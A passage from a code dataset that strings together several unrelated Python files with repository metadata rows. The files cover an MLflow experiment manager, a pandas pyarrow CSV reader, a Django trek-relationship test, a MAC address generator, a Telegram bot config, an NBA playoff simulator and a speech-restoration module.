        return self._current_uri or self.default_uri

    def set_uri(self, uri: Optional[Text] = None):
        """
        Set the current tracking URI and the corresponding variables.

        Parameters
        ----------
        uri : str
        """
        if uri is None:
            logger.info("No tracking URI is provided. Use the default tracking URI.")
            self._current_uri = self.default_uri
        else:
            # Temporarily re-set the current uri as the uri argument.
            self._current_uri = uri
        # Customized features for subclasses.
        self._set_uri()

    def _set_uri(self):
        """
        Customized features for subclasses' set_uri function.
        """
        raise NotImplementedError("Please implement the `_set_uri` method.")

    def list_experiments(self):
        """
        List all the existing experiments.

        Returns
        -------
        A dictionary (name -> experiment) of experiments information that being stored.
        """
        raise NotImplementedError("Please implement the `list_experiments` method.")
class MLflowExpManager(ExpManager):
    """
    Use mlflow to implement ExpManager.
    """

    def __init__(self, uri: Text, default_exp_name: Optional[Text]):
        super(MLflowExpManager, self).__init__(uri, default_exp_name)
        self._client = None

    def _set_uri(self):
        # Re-create the client whenever the tracking URI changes.
        self._client = mlflow.tracking.MlflowClient(tracking_uri=self.uri)
        logger.info("{:}".format(self._client))

    @property
    def client(self):
        # Delay the creation of mlflow client in case of creating `mlruns` folder when importing qlib
        if self._client is None:
            self._client = mlflow.tracking.MlflowClient(tracking_uri=self.uri)
        return self._client

    def start_exp(
        self, experiment_name: Optional[Text] = None, recorder_name: Optional[Text] = None, uri: Optional[Text] = None
    ):
        """Start (and activate) an experiment, creating it if necessary."""
        # Set the tracking uri
        self.set_uri(uri)
        # Create experiment
        experiment, _ = self._get_or_create_exp(experiment_name=experiment_name)
        # Set up active experiment
        self.active_experiment = experiment
        # Start the experiment
        self.active_experiment.start(recorder_name)
        return self.active_experiment

    def end_exp(self, recorder_status: Text = Recorder.STATUS_S):
        """End the active experiment (if any) and release the current URI."""
        if self.active_experiment is not None:
            self.active_experiment.end(recorder_status)
            self.active_experiment = None
        # When an experiment end, we will release the current uri.
        self._current_uri = None

    def create_exp(self, experiment_name: Optional[Text] = None):
        """Create a new MLflow experiment with the given (required) name."""
        assert experiment_name is not None
        # init experiment
        experiment_id = self.client.create_experiment(experiment_name)
        experiment = MLflowExperiment(experiment_id, experiment_name, self.uri)
        experiment._default_name = self.default_exp_name
        return experiment

    def _get_exp(self, experiment_id=None, experiment_name=None):
        """
        Method for getting an experiment. It will try to first get a valid experiment; if an exception occurs, it will
        raise errors.
        """
        assert (
            experiment_id is not None or experiment_name is not None
        ), "Please input at least one of experiment/recorder id or name before retrieving experiment/recorder."
        if experiment_id is not None:
            try:
                exp = self.client.get_experiment(experiment_id)
                if exp.lifecycle_stage.upper() == "DELETED":
                    raise MlflowException("No valid experiment has been found.")
                experiment = MLflowExperiment(exp.experiment_id, exp.name, self.uri)
                return experiment
            except MlflowException:
                raise ValueError(
                    "No valid experiment has been found, please make sure the input experiment id is correct."
                )
        elif experiment_name is not None:
            try:
                exp = self.client.get_experiment_by_name(experiment_name)
                if exp is None or exp.lifecycle_stage.upper() == "DELETED":
                    raise MlflowException("No valid experiment has been found.")
                experiment = MLflowExperiment(exp.experiment_id, experiment_name, self.uri)
                return experiment
            # Fix: the exception object was bound (`as e`) but never used.
            except MlflowException:
                raise ValueError(
                    "No valid experiment has been found, please make sure the input experiment name is correct."
                )

    def search_records(self, experiment_ids, **kwargs):
        """Search runs via the MLflow client; None-valued kwargs fall back to defaults."""
        filter_string = "" if kwargs.get("filter_string") is None else kwargs.get("filter_string")
        run_view_type = 1 if kwargs.get("run_view_type") is None else kwargs.get("run_view_type")
        max_results = 100000 if kwargs.get("max_results") is None else kwargs.get("max_results")
        order_by = kwargs.get("order_by")
        return self.client.search_runs(experiment_ids, filter_string, run_view_type, max_results, order_by)

    def delete_exp(self, experiment_id=None, experiment_name=None):
        """Delete an experiment by id (preferred) or by name."""
        assert (
            experiment_id is not None or experiment_name is not None
        ), "Please input a valid experiment id or name before deleting."
        try:
            if experiment_id is not None:
                self.client.delete_experiment(experiment_id)
            else:
                experiment = self.client.get_experiment_by_name(experiment_name)
                if experiment is None:
                    raise MlflowException("No valid experiment has been found.")
                self.client.delete_experiment(experiment.experiment_id)
        except MlflowException as e:
            raise Exception(
                f"Error: {e}. Something went wrong when deleting experiment. Please check if the name/id of the experiment is correct."
            )

    def list_experiments(self):
        # retrieve all the existing experiments
        exps = self.client.list_experiments(view_type=ViewType.ACTIVE_ONLY)
        experiments = dict()
        for exp in exps:
            experiment = MLflowExperiment(exp.experiment_id, exp.name, self.uri)
            experiments[exp.name] = experiment
        return experiments
| 38.772021
| 187
| 0.634639
|
618da9d33c49096eefbf5b3384c29ac97cc58080
| 5,780
|
py
|
Python
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 3
|
2021-11-23T05:35:28.000Z
|
2022-02-10T08:05:53.000Z
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 5
|
2022-02-13T14:38:04.000Z
|
2022-02-15T00:13:07.000Z
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 4
|
2022-02-04T22:58:27.000Z
|
2022-02-14T19:29:18.000Z
|
from __future__ import annotations
from pandas._typing import ReadBuffer
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.inference import is_integer
from pandas.core.frame import DataFrame
from pandas.io.parsers.base_parser import ParserBase
class ArrowParserWrapper(ParserBase):
"""
Wrapper for the pyarrow engine for read_csv()
"""
def __init__(self, src: ReadBuffer[bytes], **kwds):
super().__init__(kwds)
self.kwds = kwds
self.src = src
self._parse_kwds()
def _parse_kwds(self):
"""
Validates keywords before passing to pyarrow.
"""
encoding: str | None = self.kwds.get("encoding")
self.encoding = "utf-8" if encoding is None else encoding
self.usecols, self.usecols_dtype = self._validate_usecols_arg(
self.kwds["usecols"]
)
na_values = self.kwds["na_values"]
if isinstance(na_values, dict):
raise ValueError(
"The pyarrow engine doesn't support passing a dict for na_values"
)
self.na_values = list(self.kwds["na_values"])
def _get_pyarrow_options(self):
"""
Rename some arguments to pass to pyarrow
"""
mapping = {
"usecols": "include_columns",
"na_values": "null_values",
"escapechar": "escape_char",
"skip_blank_lines": "ignore_empty_lines",
}
for pandas_name, pyarrow_name in mapping.items():
if pandas_name in self.kwds and self.kwds.get(pandas_name) is not None:
self.kwds[pyarrow_name] = self.kwds.pop(pandas_name)
self.parse_options = {
option_name: option_value
for option_name, option_value in self.kwds.items()
if option_value is not None
and option_name
in ("delimiter", "quote_char", "escape_char", "ignore_empty_lines")
}
self.convert_options = {
option_name: option_value
for option_name, option_value in self.kwds.items()
if option_value is not None
and option_name
in ("include_columns", "null_values", "true_values", "false_values")
}
self.read_options = {
"autogenerate_column_names": self.header is None,
"skip_rows": self.header
if self.header is not None
else self.kwds["skiprows"],
}
def _finalize_output(self, frame: DataFrame) -> DataFrame:
"""
Processes data read in based on kwargs.
Parameters
----------
frame: DataFrame
The DataFrame to process.
Returns
-------
DataFrame
The processed DataFrame.
"""
num_cols = len(frame.columns)
multi_index_named = True
if self.header is None:
if self.names is None:
if self.prefix is not None:
self.names = [f"{self.prefix}{i}" for i in range(num_cols)]
elif self.header is None:
self.names = range(num_cols)
if len(self.names) != num_cols:
# usecols is passed through to pyarrow, we only handle index col here
# The only way self.names is not the same length as number of cols is
# if we have int index_col. We should just pad the names(they will get
# removed anyways) to expected length then.
self.names = list(range(num_cols - len(self.names))) + self.names
multi_index_named = False
frame.columns = self.names
# we only need the frame not the names
# error: Incompatible types in assignment (expression has type
# "Union[List[Union[Union[str, int, float, bool], Union[Period, Timestamp,
# Timedelta, Any]]], Index]", variable has type "Index") [assignment]
frame.columns, frame = self._do_date_conversions( # type: ignore[assignment]
frame.columns, frame
)
if self.index_col is not None:
for i, item in enumerate(self.index_col):
if is_integer(item):
self.index_col[i] = frame.columns[item]
else:
# String case
if item not in frame.columns:
raise ValueError(f"Index {item} invalid")
frame.set_index(self.index_col, drop=True, inplace=True)
# Clear names if headerless and no name given
if self.header is None and not multi_index_named:
frame.index.names = [None] * len(frame.index.names)
if self.kwds.get("dtype") is not None:
try:
frame = frame.astype(self.kwds.get("dtype"))
except TypeError as e:
# GH#44901 reraise to keep api consistent
raise ValueError(e)
return frame
    def read(self) -> DataFrame:
        """
        Reads the contents of a CSV file into a DataFrame and
        processes it according to the kwargs passed in the
        constructor.

        Returns
        -------
        DataFrame
            The DataFrame created from the CSV file.
        """
        # pyarrow is an optional dependency; import lazily so pandas works
        # without it when this engine is not selected.
        pyarrow_csv = import_optional_dependency("pyarrow.csv")
        # Translate pandas kwargs into the pyarrow option dicts consumed below.
        self._get_pyarrow_options()
        table = pyarrow_csv.read_csv(
            self.src,
            read_options=pyarrow_csv.ReadOptions(**self.read_options),
            parse_options=pyarrow_csv.ParseOptions(**self.parse_options),
            convert_options=pyarrow_csv.ConvertOptions(**self.convert_options),
        )
        frame = table.to_pandas()
        # Apply header/index/dtype post-processing shared with other engines.
        return self._finalize_output(frame)
| 36.582278
| 86
| 0.585121
|
522b3cfb13190630c002ab86511835edff5a93f8
| 1,551
|
py
|
Python
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 50
|
2016-10-19T23:01:21.000Z
|
2022-03-28T08:28:34.000Z
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 1,422
|
2016-10-27T10:39:40.000Z
|
2022-03-31T13:37:10.000Z
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 46
|
2016-10-27T10:59:10.000Z
|
2022-03-22T15:55:56.000Z
|
from django.test import TestCase
from django.db import IntegrityError
from django.db.models import Q
from ..factories import TrekFactory, TrekRelationshipFactory
from ..models import TrekRelationship
class TrekRelationshipsTestCase(TestCase):
    """Verify that TrekRelationship rows behave symmetrically and are unique."""
    def setUp(self):
        # Build a chain of relationships: trek1 <-> trek2 <-> trek3.
        self.trek1 = TrekFactory(name="1")
        self.trek2 = TrekFactory(name="2")
        self.trek3 = TrekFactory(name="3")
        TrekRelationshipFactory(trek_a=self.trek1, trek_b=self.trek2)
        TrekRelationshipFactory(trek_a=self.trek2, trek_b=self.trek3)
    def test_related_treks_symetries(self):
        """`related` sees a relationship regardless of which side a trek is on."""
        self.assertCountEqual(self.trek1.related.all(), [self.trek2])
        self.assertCountEqual(self.trek2.related.all(), [self.trek1, self.trek3])
        self.assertCountEqual(self.trek3.related.all(), [self.trek2])
    def test_symetrical_relationships(self):
        """Each factory call yields two DB rows (one per direction), so trek2,
        involved in two relationships, matches four rows."""
        relations_1 = TrekRelationship.objects.filter(Q(trek_a=self.trek1) | Q(trek_b=self.trek1))
        relations_2 = TrekRelationship.objects.filter(Q(trek_a=self.trek2) | Q(trek_b=self.trek2))
        relations_3 = TrekRelationship.objects.filter(Q(trek_a=self.trek3) | Q(trek_b=self.trek3))
        self.assertEqual(len(relations_1), 2)
        self.assertEqual(len(relations_2), 4)
        self.assertEqual(len(relations_3), 2)
    def test_relationship_fails_if_duplicate(self):
        """Recreating an existing pair (even reversed) violates uniqueness."""
        # This should fail, since it already exists
        def create_dup():
            return TrekRelationshipFactory(trek_a=self.trek2, trek_b=self.trek1)
        self.assertRaises(IntegrityError, create_dup)
| 43.083333
| 98
| 0.722115
|
09cdfb3aae3976468432da0c2ed7f473b966c314
| 297
|
py
|
Python
|
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | null | null | null |
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | null | null | null |
macgen.py
|
MagicVin/Virtualization-Lab
|
087671f8387b716f51eeb9aa347217782283cfba
|
[
"MIT"
] | 1
|
2022-02-01T05:33:39.000Z
|
2022-02-01T05:33:39.000Z
|
#!/usr/bin/env python3
import random
def randomMAC():
    """Return a random MAC address string such as '00:16:3e:4a:b2:01'.

    The first three octets are fixed to the 00:16:3e OUI (the range
    reserved for Xen virtual machines); the remaining three octets are
    random, with the fourth capped at 0x7f as in the original generator.
    """
    octets = [
        0x00, 0x16, 0x3e,
        random.randint(0x00, 0x7f),
        random.randint(0x00, 0xff),
        random.randint(0x00, 0xff),
    ]
    return ':'.join(f'{octet:02x}' for octet in octets)


if __name__ == '__main__':
    # Guarded so importing this module for reuse no longer prints a MAC as
    # an import side effect; running it as a script behaves as before.
    print(randomMAC())
| 22.846154
| 56
| 0.646465
|
827318bd47c604eb3b0828448db316fb4acd2446
| 1,619
|
py
|
Python
|
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | 1
|
2021-04-07T16:33:36.000Z
|
2021-04-07T16:33:36.000Z
|
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | null | null | null |
sample_config.py
|
freshremix/YouTube-Downloader-1
|
6cf005885d6bfd152e80aa1c73f878bfd03fd04a
|
[
"MIT"
] | 7
|
2021-09-24T00:16:25.000Z
|
2022-03-18T03:37:58.000Z
|
import os
class Config(object):
    """Static bot configuration, sourced from environment variables.

    Every externally-sourced setting carries a default so importing this
    module never crashes on a missing variable.
    """
    # Bot token issued by @BotFather.
    TG_BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
    # Telegram API credentials from my.telegram.org.
    APP_ID = int(os.environ.get("APP_ID", 12345))
    API_HASH = os.environ.get("API_HASH")
    # User IDs authorized to use the bot (space-separated AUTH_USERS).
    AUTH_USERS = set(int(x) for x in os.environ.get("AUTH_USERS", "").split())
    # Download directory, also served by the HTTP server.
    DOWNLOAD_LOCATION = "./DOWNLOADS"
    # Telegram's maximum file upload size in bytes.
    TG_MAX_FILE_SIZE = 2097152000
    # Chunk size (bytes) used with streaming HTTP requests.
    CHUNK_SIZE = 128
    # Generate screenshots after uploading; "True"/"False" string, default "True".
    SCREENSHOTS = os.environ.get("SCREENSHOTS", "True")
    # Fallback thumbnail used for videos.
    DEF_THUMB_NAIL_VID_S = os.environ.get("DEF_THUMB_NAIL_VID_S", "https://placehold.it/90x90")
    # Optional proxy for youtube-dl in geo-restricted areas.
    # Get your own proxy from https://github.com/rg3/youtube-dl/issues/1091#issuecomment-230163061
    HTTP_PROXY = os.environ.get("HTTP_PROXY", "")
    # Update channel for force-subscribe.
    UPDATE_CHANNEL = os.environ.get("UPDATE_CHANNEL", "")
    # Telegram's maximum message length in characters.
    MAX_MESSAGE_LENGTH = 4096
    # Timeout (seconds) for subprocess calls.  Fix: the original called
    # int(os.environ.get("TIME_LIMIT")) with no default, which raised
    # TypeError at import time whenever TIME_LIMIT was unset.
    PROCESS_MAX_TIMEOUT = int(os.environ.get("TIME_LIMIT", "3600"))
    # In-memory dict holding the request queue.
    ADL_BOT_RQ = {}
    # Watermark file path (empty string disables watermarking).
    DEF_WATER_MARK_FILE = ""
    # SQL database URL.
    DB_URI = os.environ.get("DATABASE_URL", "")
| 29.436364
| 98
| 0.686226
|
6e70b7b7f0b528f0ade3cab8ce98ef3f692a1104
| 6,463
|
py
|
Python
|
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | 2
|
2019-10-21T12:45:40.000Z
|
2021-05-22T11:12:05.000Z
|
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | null | null | null |
python/simPlayoffs.py
|
saisenberg/nba-sim
|
1b839496f77d45173aa98663f98de634fbb31a47
|
[
"MIT"
] | 1
|
2018-10-14T11:37:15.000Z
|
2018-10-14T11:37:15.000Z
|
from playoffInitialize import playoffInitialize
from playoffSeriesSim import playoffSeriesSim
# Simulate round 1 of playoffs
def simRound1(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
              win_prob_power, injury_freq, injury_print=False, result_print=False):
    """Seed the top 8 teams per conference (1v8, 2v7, 3v6, 4v5), simulate
    each first-round series, and return the list of 8 series winners."""
    playoffInitialize(depth)
    # Initialize seedings and matchups
    playoff_teams_east = standings_combined['east'][0:8]
    playoff_teams_west = standings_combined['west'][0:8]
    seeds1 = [(1,8), (2,7), (3,6), (4,5)]
    rd1 = {'east':[], 'west':[]}
    for seed_matchup in seeds1:
        # Each matchup dict maps team name -> its seed number.
        team1 = playoff_teams_east[seed_matchup[0]-1][0]
        team2 = playoff_teams_east[seed_matchup[1]-1][0]
        rd1['east'].append({team1:seed_matchup[0], team2:seed_matchup[1]})
        team1 = playoff_teams_west[seed_matchup[0]-1][0]
        team2 = playoff_teams_west[seed_matchup[1]-1][0]
        rd1['west'].append({team1:seed_matchup[0], team2:seed_matchup[1]})
    # Simulate round 1
    if (injury_print) | (result_print):
        print('Round 1:\n--------')
    winners_rd1 = []
    for conf in rd1:
        for matchup in rd1[conf]:
            team1 = list(matchup.keys())[0]
            team2 = list(matchup.keys())[1]
            # playoffSeriesSim returns a dict of team -> wins; the winner is
            # the team with the most wins in the series.
            series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                                             win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
            winner = max(series_result, key=series_result.get)
            winners_rd1.append(winner)
            if (injury_print) | (result_print):
                print('')
    return(winners_rd1)
# Simulate round 2 of playoffs
def simRound2(standings_combined, winners_rd1, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
              win_prob_power, injury_freq, injury_print=False, result_print=False):
    """Bucket round-1 winners into the two bracket halves per conference
    (seeds 1/4/5/8 and 2/3/6/7), simulate each series, and return the 4 winners."""
    # Initialize seedings and matchups
    rd2 = {'east1458':[], 'east2367':[], 'west1458':[], 'west2367':[]}
    seeds2 = [(1,4,5,8), (2,3,6,7)]
    for team in winners_rd1:
        # Recover the team's original seed from its position in the standings.
        if team in [i[0] for i in standings_combined['east']]:
            seed = [i[0] for i in standings_combined['east']].index(team)+1
            if seed in seeds2[0]:
                rd2['east1458'].append(team)
            elif seed in seeds2[1]:
                rd2['east2367'].append(team)
        elif team in [i[0] for i in standings_combined['west']]:
            seed = [i[0] for i in standings_combined['west']].index(team)+1
            if seed in seeds2[0]:
                rd2['west1458'].append(team)
            elif seed in seeds2[1]:
                rd2['west2367'].append(team)
    # Simulate round 2
    if (injury_print) | (result_print):
        print('Round 2:\n--------')
    winners_rd2 = []
    # Each bracket-half bucket holds exactly two round-1 winners.
    for matchup in rd2:
        team1 = rd2[matchup][0]
        team2 = rd2[matchup][1]
        series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                                         win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
        winner = max(series_result, key=series_result.get)
        winners_rd2.append(winner)
        if (injury_print) | (result_print):
            print('')
    return(winners_rd2)
# Simulate round 3 of playoffs (conference championship)
def simRound3(standings_combined, winners_rd2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
              win_prob_power, injury_freq, injury_print=False, result_print=False):
    """Group the four round-2 winners by conference, simulate both conference
    finals, and return the two conference champions."""
    # Initialize seedings and matchups
    rd3 = {'east':[], 'west':[]}
    for team in winners_rd2:
        if team in [i[0] for i in standings_combined['east']]:
            rd3['east'].append(team)
        elif team in [i[0] for i in standings_combined['west']]:
            rd3['west'].append(team)
    # Simulate round 3
    if (injury_print) | (result_print):
        print('Round 3:\n--------')
    winners_rd3 = []
    for matchup in rd3:
        team1 = rd3[matchup][0]
        team2 = rd3[matchup][1]
        series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                                         win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
        winner = max(series_result, key=series_result.get)
        winners_rd3.append(winner)
        if (injury_print) | (result_print):
            print('')
    return(winners_rd3)
# Simulate Finals
def simFinals(winners_rd3, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
              win_prob_power, injury_freq, injury_print=False, result_print=False):
    """Simulate the Finals between the two conference champions and return
    the champion's name."""
    if (injury_print) | (result_print):
        print('Finals:\n--------')
    team1 = winners_rd3[0]
    team2 = winners_rd3[1]
    series_result = playoffSeriesSim(team1, team2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                                     win_prob_power, injury_freq, injury_print=injury_print, result_print=result_print)
    winner = max(series_result, key=series_result.get)
    if (injury_print) | (result_print):
        print('')
    return(winner)
# Simulate entire playoffs
def simPlayoffs(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                win_prob_power, injury_freq, injury_print=False, result_print=False):
    """Simulate all four playoff rounds end to end.

    Returns
    -------
    tuple : (winner, runnerup, semifinal_east, semifinal_west)
        Champion, Finals loser, and the two conference-final losers,
        labelled by the conference they belong to in ``standings_combined``.
    """
    winners_rd1 = simRound1(standings_combined, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                            win_prob_power, injury_freq, injury_print, result_print)
    winners_rd2 = simRound2(standings_combined, winners_rd1, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                            win_prob_power, injury_freq, injury_print, result_print)
    winners_rd3 = simRound3(standings_combined, winners_rd2, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                            win_prob_power, injury_freq, injury_print, result_print)
    winner = simFinals(winners_rd3, depth, injuries, cities, city_abbrvs, pca_s, pca_b, RF,
                       win_prob_power, injury_freq, injury_print, result_print)
    # Fix: compare team names by value, not identity -- the original used
    # `is not`, which only works while the exact same string objects happen
    # to flow through every round.
    runnerup = [team for team in winners_rd3 if team != winner][0]
    # Fix: label each conference-final loser by its actual conference instead
    # of assuming list positions 0/1 are east/west.  winners_rd2 holds two
    # teams per conference; removing the two Finals participants (one per
    # conference) leaves exactly one loser in each.
    remaining = [team for team in winners_rd2 if team not in (winner, runnerup)]
    east_teams = [entry[0] for entry in standings_combined['east']]
    semifinal_east = next(team for team in remaining if team in east_teams)
    semifinal_west = next(team for team in remaining if team not in east_teams)
    return(winner, runnerup, semifinal_east, semifinal_west)
| 46.164286
| 127
| 0.63763
|
22b192e4be7b7eedea13e134737ce51a23b66f11
| 5,710
|
py
|
Python
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 159
|
2021-09-26T08:09:45.000Z
|
2022-03-30T07:51:02.000Z
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 15
|
2021-09-30T04:28:09.000Z
|
2022-03-27T05:06:32.000Z
|
voicefixer/base.py
|
ishine/voicefixer
|
0966a2f39096575cf8ae3fed8b53daf2f4512f35
|
[
"MIT"
] | 32
|
2021-09-27T03:24:01.000Z
|
2022-03-30T07:52:15.000Z
|
import librosa.display
from voicefixer.tools.pytorch_util import *
from voicefixer.tools.wav import *
from voicefixer.restorer.model import VoiceFixer as voicefixer_fe
import os
EPS = 1e-8
class VoiceFixer(nn.Module):
    """Speech-restoration wrapper: a pretrained analysis model plus vocoder.

    Loads a restoration checkpoint from ``~/.cache/voicefixer`` and exposes
    :meth:`restore` / :meth:`restore_inmem` for denoising and resynthesising
    44.1 kHz speech.
    """
    def __init__(self):
        super(VoiceFixer, self).__init__()
        # Restoration front-end network, fixed at 44.1 kHz, 2 channels.
        self._model = voicefixer_fe(channels=2, sample_rate=44100)
        # print(os.path.join(os.path.expanduser('~'), ".cache/voicefixer/analysis_module/checkpoints/epoch=15_trimed_bn.ckpt"))
        self._model.load_state_dict(
            torch.load(
                os.path.join(
                    os.path.expanduser("~"),
                    ".cache/voicefixer/analysis_module/checkpoints/vf.ckpt",
                )
            )
        )
        self._model.eval()
    def _load_wav_energy(self, path, sample_rate, threshold=0.95):
        """Load ``path`` and estimate the frequency (Hz) below which
        ``threshold`` of the log-spectral energy lies.

        Returns (waveform, cutoff_hz).
        """
        wav_10k, _ = librosa.load(path, sr=sample_rate)
        stft = np.log10(np.abs(librosa.stft(wav_10k)) + 1.0)
        fbins = stft.shape[0]
        # Turn per-bin energies into a cumulative sum from the low end:
        # after this loop e_stft[k] holds the energy of bins [0, k).
        e_stft = np.sum(stft, axis=1)
        for i in range(e_stft.shape[0]):
            e_stft[-i - 1] = np.sum(e_stft[: -i - 1])
        total = e_stft[-1]
        # Find the first bin whose cumulative energy reaches the threshold.
        for i in range(e_stft.shape[0]):
            if e_stft[i] < total * threshold:
                continue
            else:
                break
        return wav_10k, int((sample_rate // 2) * (i / fbins))
    def _load_wav(self, path, sample_rate, threshold=0.95):
        """Load ``path`` resampled to ``sample_rate``.

        ``threshold`` is accepted for signature parity with
        ``_load_wav_energy`` but is unused here.
        """
        wav_10k, _ = librosa.load(path, sr=sample_rate)
        return wav_10k
    def _amp_to_original_f(self, mel_sp_est, mel_sp_target, cutoff=0.2):
        """Rescale the estimated mel so its low-band (bins 5..cutoff) mean
        energy matches the target's; returns (scaled_est, target)."""
        freq_dim = mel_sp_target.size()[-1]
        mel_sp_est_low, mel_sp_target_low = (
            mel_sp_est[..., 5 : int(freq_dim * cutoff)],
            mel_sp_target[..., 5 : int(freq_dim * cutoff)],
        )
        energy_est, energy_target = torch.mean(mel_sp_est_low, dim=(2, 3)), torch.mean(
            mel_sp_target_low, dim=(2, 3)
        )
        amp_ratio = energy_target / energy_est
        return mel_sp_est * amp_ratio[..., None, None], mel_sp_target
    def _trim_center(self, est, ref):
        """Trim ``est``/``ref`` along the last axis to a common length,
        centre-cropping whichever is longer."""
        diff = np.abs(est.shape[-1] - ref.shape[-1])
        if est.shape[-1] == ref.shape[-1]:
            return est, ref
        elif est.shape[-1] > ref.shape[-1]:
            min_len = min(est.shape[-1], ref.shape[-1])
            est, ref = est[..., int(diff // 2) : -int(diff // 2)], ref
            est, ref = est[..., :min_len], ref[..., :min_len]
            return est, ref
        else:
            min_len = min(est.shape[-1], ref.shape[-1])
            est, ref = est, ref[..., int(diff // 2) : -int(diff // 2)]
            est, ref = est[..., :min_len], ref[..., :min_len]
            return est, ref
    def _pre(self, model, input, cuda):
        """Run the model front-end: waveform -> (linear spectrogram, mel)."""
        # Add batch and channel axes: (T,) -> (1, 1, T).
        input = input[None, None, ...]
        input = torch.tensor(input)
        input = try_tensor_cuda(input, cuda=cuda)
        sp, _, _ = model.f_helper.wav_to_spectrogram_phase(input)
        mel_orig = model.mel(sp.permute(0, 1, 3, 2)).permute(0, 1, 3, 2)
        # return models.to_log(sp), models.to_log(mel_orig)
        return sp, mel_orig
    def remove_higher_frequency(self, wav, ratio=0.95):
        """Zero all STFT bins above the frequency that holds ``ratio`` of the
        clamped log-magnitude energy, then invert back to a waveform."""
        stft = librosa.stft(wav)
        real, img = np.real(stft), np.imag(stft)
        mag = (real**2 + img**2) ** 0.5
        # Preserve phase via cos/sin so magnitude can be edited independently.
        cos, sin = real / (mag + EPS), img / (mag + EPS)
        spec = np.abs(stft)  # [1025,T]
        feature = spec.copy()
        feature = np.log10(feature + EPS)
        feature[feature < 0] = 0
        energy_level = np.sum(feature, axis=1)
        threshold = np.sum(energy_level) * ratio
        curent_level, i = energy_level[0], 0
        while i < energy_level.shape[0] and curent_level < threshold:
            curent_level += energy_level[i + 1, ...]
            i += 1
        spec[i:, ...] = np.zeros_like(spec[i:, ...])
        stft = spec * cos + 1j * spec * sin
        return librosa.istft(stft)
    @torch.no_grad()
    def restore_inmem(self, wav_10k, cuda=False, mode=0, your_vocoder_func=None):
        """Restore an in-memory waveform (assumed 44.1 kHz -- TODO confirm),
        processing it in 30-second segments; returns a numpy waveform.

        mode 0: plain inference; mode 1: also strip high frequencies from the
        input first; mode 2: run with the model in train() mode.
        """
        check_cuda_availability(cuda=cuda)
        self._model = try_tensor_cuda(self._model, cuda=cuda)
        if mode == 0:
            self._model.eval()
        elif mode == 1:
            self._model.eval()
        elif mode == 2:
            self._model.train()  # More effective on seriously demaged speech
        res = []
        seg_length = 44100 * 30
        break_point = seg_length
        while break_point < wav_10k.shape[0] + seg_length:
            segment = wav_10k[break_point - seg_length : break_point]
            if mode == 1:
                segment = self.remove_higher_frequency(segment)
            sp, mel_noisy = self._pre(self._model, segment, cuda)
            out_model = self._model(sp, mel_noisy)
            denoised_mel = from_log(out_model["mel"])
            if your_vocoder_func is None:
                out = self._model.vocoder(denoised_mel, cuda=cuda)
            else:
                out = your_vocoder_func(denoised_mel)
            # unify energy
            if torch.max(torch.abs(out)) > 1.0:
                out = out / torch.max(torch.abs(out))
                # NOTE(review): `input` here is the Python builtin, not the
                # current segment -- this prints a function repr; likely a bug.
                print("Warning: Exceed energy limit,", input)
            # frame alignment
            out, _ = self._trim_center(out, segment)
            res.append(out)
            break_point += seg_length
        out = torch.cat(res, -1)
        return tensor2numpy(out.squeeze(0))
    def restore(self, input, output, cuda=False, mode=0, your_vocoder_func=None):
        """Restore the wav file at ``input`` and write the result to ``output``."""
        wav_10k = self._load_wav(input, sample_rate=44100)
        out_np_wav = self.restore_inmem(
